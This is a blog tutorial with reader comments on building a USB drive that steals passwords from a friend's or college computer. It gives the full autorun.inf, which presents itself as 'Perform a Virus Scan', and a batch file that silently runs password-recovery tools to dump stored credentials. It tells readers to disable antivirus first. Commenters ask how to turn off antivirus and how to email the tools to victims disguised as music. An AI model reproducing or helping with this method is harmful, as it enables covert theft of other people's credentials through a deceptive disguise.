How to Hack passwords using a USB
Hello Friends,
Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password hacking toolkit.
NOTE: You must temporarily disable your Anti-Virus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad as launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista.
Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.

But is there a way to autorun from the flash drive just like a CD/DVD does? Without the user having to double click on the flash drive?
So… wont the anti-virus freak out on the other computer when you try to auto run this?
Also are these programs “safe”? I don’t really want to put trojans onto all of my friends computers…

@Falcon: These programs have been scanned by Kaspersky. They are safe.
@Vaishakh: May be you have set master password in your Firefox. It wont work if the master password has been set. So if you want to secure your passwords then you should set master password.
Don’t you think you should upload files somewhere else like rapidshare? It takes years (or ages?) to download and weight.

I have tried this trick, but before it get started antivirus softwares scans it and deleted all the above .exe files.
Tell me more about how to disable temporarily any type of antivirus software program to hack.

hey that trick was nice but it is not working. can you help me out . i am interested in hacking . i will tell you the problem .
it :-
1.Disabled my anti virus.
2.I downloaded all the files according to the steps.
3.Then i extracted them .
4.I copied all the .exe files on my pendrive.
5.I restarted my computer then inserted it . I selected the first option of scanning.
6.Then you told to remove the pendrive . I did that too.
7.I started my other computer but when i looked into my pendrive there was a single .txt file in it.

I followed exactly the tutorial
I am under win 7
I start the pc with usb selection as the first boot (default on the HDD and then launched the Windows directly)
I marked as the error “try ntfs [0.0]: No grld” etc. …
I tested by putting penstic in fat or ntfs is the same problem

Plis, somebody shud make this whole thing clear to me! Is to crack the password protected computer on startup environment or on desktop environment to extract thd password files?
easy-shareware is a very problem some……better to use other website…could not download but this trick should work

Thats what im wondering i did it with a floppy disk and i had the same eproblem it wont auto run
I put everything onto my pen drive as it says in the guide but when I tried it on my friends laptop (using windows vista) it runs the virus scan but says that files can’t be found and when I checked that pen drive all the MessenPass, Mail PassView, etc, etc has been deleted off the pen drive. Can anyone help??

You are getting this error (‘failed to find signons file of firefox’) because the link here provides PasswordFox v. 1.1.1 and it does not support newer versions of Firefox.
Passwordfox 1.2 Will do it!

h3y i read ur post & it’s fantastic! im following every step… but i read it over & i’ve got one question. can i also get the victim’s passwords by sending the files to them in email (disguising them as music files or sth)??? please reply ASAP! thanks
all 5 of the files are published by nir soft & 3 of them dont work. i tried downloading that 3 from other webs but i discovered that they were all from that nir soft so…is there any other way?
